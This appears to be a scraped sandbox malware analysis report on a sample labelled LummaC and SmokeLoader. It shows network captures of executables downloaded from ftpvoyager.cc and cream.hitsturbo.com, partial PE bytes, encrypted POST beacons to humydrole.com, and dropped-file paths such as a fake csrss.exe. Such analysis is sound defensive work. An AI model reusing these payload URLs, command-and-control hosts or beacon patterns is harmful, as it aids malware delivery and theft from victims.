Timestamp	Bytes transferred	Direction	Data
Dec 22, 2023 04:57:31.913280010 CET	164	OUT	GET /ftp/index.php HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: ftpvoyager.cc
Dec 22, 2023 04:57:32.893627882 CET	1286	IN	HTTP/1.1 200 OK Server: nginx/1.24.0 Date: Fri, 22 Dec 2023 03:57:32 GMT Content-Type: application/octet-stream Connection: close Content-Description: File Transfer Content-Disposition: attachment; filename=3e6c2ca3.exe Content-Transfer-Encoding: binary Expires: 0 Cache-Control: must-revalidate Pragma: public Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 bb c5 5a 63 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 52 02 00 00 76 43 00 00 00 00 00 9c 3e 00 00 00 10 00 00 00 70 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 c0 45 00 00 04 00 00 ff 47 04 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 88 9c 02 00 50 00 00 00 00 c0 44 00 70 f2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 71 02 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 8f 02 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 02 00 7c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a2 50 02 00 00 10 00 00 00 52 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 1e 35 00 00 00 70 02 00 00 36 00 00 00 56 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 b8 07 42 00 00 b0 02 00 00 18 00 00 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 70 f2 00 00 00 c0 44 00 00 f4 00 00 00 a4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELZcRvC>p@EGPDpq@p\|.textPR `.rdata5p6V@@.dataB@.rsrcpD@@
Dec 22, 2023 04:57:32.893697023 CET	1286	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 8b ec 56 8d 45 08 50 8b f1 e8 70 28 00 00 c7 06 04 72 42 Data Ascii: UVEPp(rB^]rB!)UVEtV6+^]UEQRUQR+]UEQRUQRy']ffhHB
Dec 22, 2023 04:57:33.231786013 CET	1286	IN	Data Raw: 42 00 8b 4d f8 5f 89 4e 04 5e 5b 8b e5 5d c2 04 00 8b 55 f8 5f 89 56 04 5e 5b 8b e5 5d c2 04 00 cc cc cc cc cc cc cc cc 55 8b ec a1 58 b6 84 00 8b 0d ac a5 84 00 c1 e8 03 81 ec 08 08 00 00 85 c0 0f 86 97 00 00 00 53 8b 1d 34 70 42 00 56 8b 35 90 Data Ascii: BM_N^[]U_V^[]UXS4pBV5pBW=pBME=XYuTjjjjPjhBjjjjhBhBjjjjjj0pBjjjjjjj8pBMQWEmu_^[]UQE
Dec 22, 2023 04:57:33.231817961 CET	1286	IN	Data Raw: cc cc e8 ab f7 ff ff c2 04 00 cc cc cc cc cc cc cc cc 33 c0 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc e9 8b f7 ff ff cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 83 ec 08 56 8b f1 8b 06 8b 50 10 57 ff d2 89 45 fc e8 67 f7 ff ff 8b f8 8d 55 fc 8d 45 Data Ascii: 3UVPWEgUE}Gt_^]_^]UU@RUjR]UVW}3MuS]Eh~2;}EVPEPSUu
Dec 22, 2023 04:57:33.231831074 CET	1286	IN	Data Raw: 46 40 01 74 0d 8b 4d f0 53 51 8d 4e 44 e8 da 05 00 00 83 4e 40 01 8b ce e8 7f 07 00 00 8b f0 8d 45 08 e8 55 f2 ff ff 5f 88 06 8b 45 08 5e 5b 8b e5 5d c2 04 00 cc cc cc cc cc cc cc 55 8b ec 83 ec 08 56 8b f1 57 8b c6 e8 4f 06 00 00 85 c0 0f 84 9b Data Ascii: F@tMSQNDN@EU_E^[]UVWO@';:UE}u'EEJEuF@uC%UE}uEEP_^]
Dec 22, 2023 04:57:33.231842995 CET	1286	IN	Data Raw: 8b c6 5e 5d c2 04 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 56 8b f1 e8 45 ee ff ff f6 45 08 01 74 09 56 e8 76 17 00 00 83 c4 04 8b c6 5e 5d c2 04 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 56 8b f1 e8 a5 f8 ff ff f6 Data Ascii: ^]UVEEtVv^]UVEtVF^]U}S]Vt(~r"FW8vSWjPFF@PW9_SFI^[]UEP
Dec 22, 2023 04:57:33.570259094 CET	1286	IN	Data Raw: 01 00 00 8d 14 70 8d 45 fc e8 b2 e7 ff ff 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 50 e8 77 12 00 00 59 c3 cc cc cc cc cc cc cc cc 55 8b ec 53 56 57 8b 7d 08 8b f0 8b c7 8b d9 e8 4c f3 ff ff 3b c6 73 05 e8 eb 08 00 00 8b c7 e8 3c f3 Data Ascii: pE]PwYUSVW}L;s<E+;s;]u73_^[]6t(EWKpPQc:_^[];s9{sCPWS3;uV3
Dec 22, 2023 04:57:33.570298910 CET	1286	IN	Data Raw: 01 83 f8 04 7d 0f 6b c0 18 05 a0 c7 42 00 50 e8 a5 08 00 00 59 c3 8b ff 55 8b ec ff 75 14 ff 75 10 ff 75 0c ff 75 08 e8 ff 09 00 00 8b 45 08 83 c4 10 5d c3 8b ff 55 8b ec 83 7d 08 00 56 74 2b 8b 71 18 8d 41 04 83 fe 10 72 04 8b 10 eb 02 8b d0 39 Data Ascii: }kBPYUuuuuE]U}Vt+qAr9UrrI;Mv2^]Uuuuu]Uuuuus]UQuuuuuUQuuuuujP^B%
Dec 22, 2023 04:57:33.570365906 CET	1286	IN	Data Raw: 3b f7 75 19 8b 45 08 6a ff 03 c3 50 e8 53 ff ff ff 53 6a 00 8b ce e8 49 ff ff ff eb 46 6a 00 ff 75 08 e8 f1 fd ff ff 84 c0 74 38 83 7f 18 10 72 05 8b 7f 04 eb 03 83 c7 04 8b 4e 18 83 f9 10 72 05 8b 46 04 eb 03 8d 46 04 ff 75 08 03 fb 57 51 50 e8 Data Ascii: ;uEjPSSjIFjut8rNrFFuWQPLu_^[]UVjFrjjuD^]j^B;u}WReWNrByUVurB^]U
Dec 22, 2023 04:57:33.570442915 CET	1286	IN	Data Raw: 2c fd ff ff ff 15 c0 70 42 00 8d 85 28 fd ff ff 50 ff 15 bc 70 42 00 6a 03 e8 a0 13 00 00 cc 8b ff 55 8b ec 8b 45 14 56 57 33 ff 3b c7 74 47 39 7d 08 75 1b e8 89 1d 00 00 6a 16 5e 89 30 57 57 57 57 57 e8 12 1d 00 00 83 c4 14 8b c6 eb 29 39 7d 10 Data Ascii: ,pB(PpBjUEVW3;tG9}uj^0WWWWW)9}t9Esdj"YPuuK3_^]``trBUS]VWtrBt&PRFVYYGt3VPgG_^[]UMtrB
Dec 22, 2023 04:57:33.570483923 CET	1286	IN	Data Raw: 55 8b ec 83 3d 94 c8 42 00 01 75 05 e8 6e 13 00 00 ff 75 08 e8 bb 11 00 00 68 ff 00 00 00 e8 63 0c 00 00 59 59 5d c3 6a 58 68 f0 96 42 00 e8 65 39 00 00 33 f6 89 75 fc 8d 45 98 50 ff 15 c4 70 42 00 6a fe 5f 89 7d fc b8 4d 5a 00 00 66 39 05 00 00 Data Ascii: U=BunuhcYY]jXhBe93uEPpBj_}MZf9@u8<@@PEu'f9@ut@v39@Mu3CS8YujXY,7ujGY2]c0}jbYL0/B3/}j=

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2023 04:57:41.460612059 CET	171	OUT	GET /order/tuc5.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: cream.hitsturbo.com
Dec 22, 2023 04:57:41.906048059 CET	1286	IN	HTTP/1.1 200 OK Date: Fri, 22 Dec 2023 03:57:41 GMT Content-Type: application/octet-stream Content-Length: 7069897 Connection: keep-alive Content-Description: File Transfer Content-Disposition: attachment; filename=tuc5.exe Content-Transfer-Encoding: binary Expires: 0 Cache-Control: must-revalidate Pragma: public CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=W6GiskSNbQ2Mbg248iad7RGLEkY3cAZj64J4SSG9Ro9PRCK%2FVRV1nthR5TCNvCK%2B7aEA7whDfW6yGaiakgMXmbDFx%2BHbcdmA15d%2BFoR5hs8d5fAMDmluYRM2alhU%2F0itKDZFHM1t"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8395712e7df27469-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 08 00 35 09 85 65 00 00 00 00 00 00 00 00 e0 00 8e 81 0b 01 02 19 00 94 00 00 00 46 00 00 00 00 00 00 40 9c 00 00 00 10 00 00 00 b0 00 00 00 00 40 00 00 10 00 00 00 02 00 00 01 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 40 01 00 00 04 00 00 00 00 00 00 02 00 00 80 00 00 10 00 00 40 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 50 09 00 00 00 10 01 00 00 2c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 43 4f 44 45 00 00 00 00 64 93 00 00 00 10 00 00 00 Data Ascii: MZP@!L!This program must be run under Win32$7PEL5eF@@@@P,CODEd
Dec 22, 2023 04:57:41.906069994 CET	1286	IN	Data Raw: 94 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 44 41 54 41 00 00 00 00 4c 02 00 00 00 b0 00 00 00 04 00 00 00 98 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 42 53 53 00 00 00 00 00 4c 0e 00 00 00 c0 00 00 00 00 00 Data Ascii: `DATAL@BSSL.idataP@.tls.rdata@P.reloc
Dec 22, 2023 04:57:41.906138897 CET	1286	IN	Data Raw: b0 01 5e 5b c3 8b 50 04 8b 08 89 0a 89 51 04 8b 15 38 c4 40 00 89 10 a3 38 c4 40 00 c3 53 56 57 55 51 8b f1 89 14 24 8b e8 8b 5d 00 8b 04 24 8b 10 89 16 8b 50 04 89 56 04 8b 3b 8b 43 08 8b d0 03 53 0c 3b 16 75 14 8b c3 e8 b7 ff ff ff 8b 43 08 89 Data Ascii: ^[PQ8@8@SVWUQ$]$PV;CS;uCCFV;uCF;uUu3Z]_^[@SVWU2C;rlJk;w^;uBCB)C{uD5;r{;u)s&J$+\|
Dec 22, 2023 04:57:41.906234980 CET	1286	IN	Data Raw: ff 83 7c 24 0c 00 0f 85 66 ff ff ff 8d 4c 24 0c 8b 54 24 08 8b 44 24 04 e8 da fc ff ff 8b 04 24 33 d2 89 10 eb 48 8b 6b 08 3b f5 75 3a 3b 7b 0c 7f 35 8b 0c 24 8b d7 8b c5 e8 71 fd ff ff 8b 04 24 83 38 00 74 28 8b 04 24 8b 40 04 01 43 08 8b 04 24 Data Ascii: \|$fL$T$D$$3Hk;u:;{5$q$8t($@C$@)C{u$3]_^[SVW$?4$;s[+L$L@]\$tL$T$&D$D$D$D$\|$tT$L@
Dec 22, 2023 04:57:41.906311989 CET	1286	IN	Data Raw: 00 7f 30 8b d6 c1 ea 02 a1 74 c4 40 00 8b 44 90 f4 85 c0 75 10 a1 74 c4 40 00 89 5c 90 f4 89 5b 04 89 1b eb 3a 8b 10 89 43 04 89 13 89 18 89 5a 04 eb 2c 81 fe 00 3c 00 00 7c 0d 8b d6 8b c7 e8 09 ff ff ff 84 c0 75 17 a1 68 c4 40 00 89 1d 68 c4 40 Data Ascii: 0t@Dut@\[:CZ,<\|uh@h@CZ_^[=l@~@=l@}@+l@p@p@3p@3l@SVW<$L$x@<\$u3R;s)G
Dec 22, 2023 04:57:41.906461000 CET	1286	IN	Data Raw: 00 e9 9e 00 00 00 03 da 8b f0 e8 90 f8 ff ff 81 e3 fc ff ff 7f 8b c6 03 c3 8b f8 3b 3d 70 c4 40 00 75 2c 29 1d 70 c4 40 00 01 1d 6c c4 40 00 81 3d 6c c4 40 00 00 3c 00 00 7e 05 e8 1f fb ff ff 33 c0 89 45 fc e8 e9 0c 00 00 e9 85 00 00 00 8b 10 f6 Data Ascii: ;=p@u,)p@l@=l@<~3Et}@7)xt8tx}@P;@E3ZYYdh"@=2@th@E_^[Y]SVWU}
Dec 22, 2023 04:57:41.906537056 CET	1286	IN	Data Raw: 39 d9 75 38 83 c0 08 83 c2 08 4e 75 e2 eb 06 83 c0 04 83 c2 04 5e 83 e6 03 74 36 8a 08 3a 0a 75 30 4e 74 13 8a 48 01 3a 4a 01 75 25 4e 74 08 8a 48 02 3a 4a 02 75 1a 31 c0 5e 5b c3 5e 38 d9 75 10 38 fd 75 0c c1 e9 10 c1 eb 10 38 d9 75 02 38 fd 5e Data Ascii: 9u8Nu^t6:u0NtH:Ju%NtH:Ju1^[^8u8u8u8^[Wfx_i,@B,@SVWPtQ11F t-tE+tB$tBt20w*9w&Fut\|Y12_^[F~[)
Dec 22, 2023 04:57:41.906641960 CET	1286	IN	Data Raw: 15 0c c0 40 00 85 d2 0f 84 8b 00 00 00 ff d2 85 c0 0f 84 81 00 00 00 8b 54 24 0c e8 db fe ff ff 89 c2 8b 44 24 04 8b 48 0c 83 48 04 02 53 31 db 56 57 55 64 8b 1b 53 50 52 51 8b 54 24 28 6a 00 50 68 79 2c 40 00 52 e8 53 e5 ff ff 8b 7c 24 28 e8 d2 Data Ascii: @T$D$HHS1VWUdSPRQT$(jPhy,@RS\|$(o_G,@RA_D$@8tr@u@T$SVWUJYqt
Dec 22, 2023 04:57:41.906709909 CET	1286	IN	Data Raw: e2 00 00 00 e8 05 0d 00 00 eb 0c 53 a1 d0 c3 40 00 50 e8 ca e0 ff ff 89 1d 8c c4 40 00 5b c3 8b c0 8a 0d 30 c0 40 00 8b 05 d0 c3 40 00 84 c9 75 28 64 8b 15 2c 00 00 00 8b 04 82 c3 e8 98 ff ff ff 8b 05 d0 c3 40 00 50 e8 8c e0 ff ff 85 c0 74 01 c3 Data Ascii: S@P@[0@@u(d,@Pt@PzttJI\|JuBSVtJI\|JuBNu^[t#JAPRBXXRH\|ZXJtJI\|JuB
Dec 22, 2023 04:57:41.906831026 CET	1286	IN	Data Raw: 68 00 08 00 00 8d 44 24 0c 50 53 57 6a 00 6a 00 e8 ce db ff ff 8b c8 8b d4 8b c6 e8 1f fc ff ff eb 33 6a 00 6a 00 6a 00 6a 00 53 57 6a 00 6a 00 e8 ae db ff ff 8b e8 8b c6 8b cd 33 d2 e8 fd fb ff ff 6a 00 6a 00 55 8b 06 50 53 57 6a 00 6a 00 e8 8e Data Ascii: hD$PSWjj3jjjjSWjj3jjUPSWjj]_^[@SVS]^[SVWU) =}+hD$PV'PjjPD$P"(jjVSjjUjUWVSjj
Dec 22, 2023 04:57:41.906929016 CET	1286	IN	Data Raw: 00 ff 36 e8 5d d6 ff ff 40 0f 84 c9 00 00 00 2d 81 00 00 00 73 02 33 c0 6a 00 6a 00 50 ff 36 e8 79 d6 ff ff 40 0f 84 ad 00 00 00 6a 00 8b d4 6a 00 52 68 80 00 00 00 8d 96 4c 01 00 00 52 ff 36 e8 40 d6 ff ff 5a 48 0f 85 8b 00 00 00 33 c0 3b c2 73 Data Ascii: 6]@-s3jjP6y@jjRhLR6@ZH3;sLLt@jj+P6/@tg6Hu]"F$O:@~tjjt;~t6tuF R:@3^6sFiFLH3

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2023 04:58:00.046700954 CET	284	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://gukxtwdvplosk.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 163 Host: humydrole.com
Dec 22, 2023 04:58:00.046736002 CET	163	OUT	Data Raw: 3b 6e 26 63 f2 bb 60 54 df aa b0 77 04 06 72 c9 78 7f c9 e0 62 00 e1 6a 09 7d 7c 92 34 cb b6 6d 9e 5d b6 21 04 18 26 1c 9b ed 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 3e 0a b4 f0 Data Ascii: ;n&c`Twrxbj}\|4m]!&?#1\|J7 M@NA .[k,vu>.lD>7DK1%l7pl8S@T])nGT&
Dec 22, 2023 04:58:00.431952953 CET	253	IN	HTTP/1.0 404 Not Found Date: Fri, 22 Dec 2023 03:58:00 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15 X-Powered-By: PHP/7.4.15 Content-Length: 8 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 04 00 00 00 72 e8 85 e5 Data Ascii: r

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2023 04:58:00.721498966 CET	286	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://hbpsjibmmyknnqg.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 188 Host: humydrole.com
Dec 22, 2023 04:58:00.721533060 CET	188	OUT	Data Raw: 3b 6e 26 63 f2 bb 60 54 df aa b0 77 04 06 72 c9 78 7f c9 e0 62 00 e1 6a 09 7d 7c 92 34 cb b6 6d 9e 5d b6 21 04 18 26 1c 9b ed 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0a 6b 2c 90 f5 76 0b 75 58 08 d5 fa Data Ascii: ;n&c`Twrxbj}\|4m]!&?#1\|J7 M@NA -[k,vuX#vuwIU(K@/FHF#x0E<_xu"!`*4U`rC
Dec 22, 2023 04:58:01.110094070 CET	587	IN	HTTP/1.0 404 Not Found Date: Fri, 22 Dec 2023 03:58:00 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15 X-Powered-By: PHP/7.4.15 Content-Length: 340 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report HVqTxn73uD.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Threatname: SmokeLoader

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Bitcoin Miner

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Drivers\csrss.exe

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

C:\Users\user\AppData\Local\Temp\2788.exe

C:\Users\user\AppData\Local\Temp\3EBB.exe

C:\Users\user\AppData\Local\Temp\4294.exe

C:\Users\user\AppData\Local\Temp\46BC.dll

C:\Users\user\AppData\Local\Temp\4KPV6A~1\cached-certs (copy)

C:\Users\user\AppData\Local\Temp\4KPV6A~1\cached-microdesc-consensus (copy)

Windows Analysis Report
HVqTxn73uD.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2023 04:58:01.391803026 CET	286	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ybgbelfkyelowcj.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 129 Host: humydrole.com
Dec 22, 2023 04:58:01.391824961 CET	129	OUT	Data Raw: 3b 6e 26 63 f2 bb 60 54 df aa b0 77 04 06 72 c9 78 7f c9 e0 62 00 e1 6a 09 7d 7c 92 34 cb b6 6d 9e 5d b6 21 04 18 26 1c 9b ed 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0b 6b 2c 90 f5 76 0b 75 46 2f f8 f7 Data Ascii: ;n&c`Twrxbj}\|4m]!&?#1\|J7 M@NA -[k,vuF/h`xc/_\]j*JIf^
Dec 22, 2023 04:58:02.533235073 CET	587	IN	HTTP/1.0 404 Not Found Date: Fri, 22 Dec 2023 03:58:01 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15 X-Powered-By: PHP/7.4.15 Content-Length: 340 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The 